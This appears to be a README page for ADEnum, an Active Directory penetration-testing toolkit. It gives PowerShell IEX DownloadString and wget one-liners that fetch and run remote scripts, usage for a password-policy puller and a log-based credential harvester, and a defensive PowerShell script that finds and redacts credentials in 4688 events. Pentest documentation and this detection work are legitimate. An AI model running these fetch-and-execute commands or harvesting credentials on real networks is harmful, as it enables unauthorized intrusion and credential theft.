Windows:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kahvi-0/ADEnum/refs/heads/main/ADEnum.ps1')
adenum
Linux:
wget https://raw.githubusercontent.com/Kahvi-0/ADEnum/refs/heads/main/ADEnum.sh && chmod +x ADEnum.sh
./ADEnum.sh [One DC] [username] [password]
Windows - ensure that nmap is installed (may need to change the location in the script)
vulnscan.ps1 scope.txt
Automated enumeration of possible password policy locations
Linux
The distinguished name can be found in BloodHound
wget https://raw.githubusercontent.com/Kahvi-0/ADEnum/main/passpull.sh && chmod +x passpull.sh
Usage
passpull.sh [user] [password] [dc list] [domain.local] [distinguished name]
Example
passpull.sh CoffeeLover 'p@ssword123' ./dcs.txt domain.local "CN=PENTEST,OU=USERS,OU=test,DC=lab,DC=LOCAL"
Inspired by: https://practicalsecurityanalytics.com/extracting-credentials-from-windows-logs/
Searches through Windows 4688 events. This only works if the client has enabled logging. The script checks for the registry key.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kahvi-0/ADEnum/main/logharvest.ps1')
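The 4688 dependency described above, seen from the defender's side, as an added example that is not part of ADEnum or logharvest.ps1: it checks whether command-line capture is enabled and lists recent process-creation events whose command line carries a credential, with the value masked. The registry value is the standard Windows policy setting and is only assumed to be the key the page refers to; the patterns and the `Find-ExposedSecret` helper are constructed for illustration.

```powershell
# Added example: audit 4688 (process creation) events for secrets typed on
# the command line and report them redacted. Needs an elevated session.

# Assumption: the standard policy value that turns on command-line capture.
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
$enabled  = (Get-ItemProperty -Path $auditKey -ErrorAction SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled
if ($enabled -ne 1) {
    Write-Warning 'Command-line capture is off: 4688 events carry no CommandLine data.'
}

# Constructed patterns: group 1 is the prefix that is kept, group 2 the secret.
$patterns = @(
    '(net\s+user\s+\S+\s+)(?!/)(\S+)',                           # net user <name> <password>
    '((?:/|-{1,2})(?:password|passwd|pass|pwd)[:=\s]+)(\S+)',    # /password:x  --pwd=x  -pass x
    '(ConvertTo-SecureString\s+(?:-String\s+)?)(\S+)'            # plaintext fed to SecureString
)

function Find-ExposedSecret {
    param([string]$CommandLine)
    foreach ($p in $patterns) {
        if ($CommandLine -match $p) {
            # Mask the secret so the report itself does not leak it.
            return [regex]::Replace($CommandLine, $p, '$1<redacted>', 'IgnoreCase')
        }
    }
    return $null
}

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } `
                       -MaxEvents 5000 -ErrorAction SilentlyContinue
foreach ($e in $events) {
    # Read fields by name from the event XML rather than by property index.
    $data = ([xml]$e.ToXml()).Event.EventData.Data
    $cmd  = ($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
    if (-not $cmd) { continue }

    $hit = Find-ExposedSecret -CommandLine $cmd
    if ($hit) {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            User    = ($data | Where-Object { $_.Name -eq 'SubjectUserName' }).'#text'
            Process = ($data | Where-Object { $_.Name -eq 'NewProcessName' }).'#text'
            Command = $hit
        }
    }
}
```

Each hit is an account whose credential should be rotated and a script or habit that should stop passing secrets as arguments.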
More reading: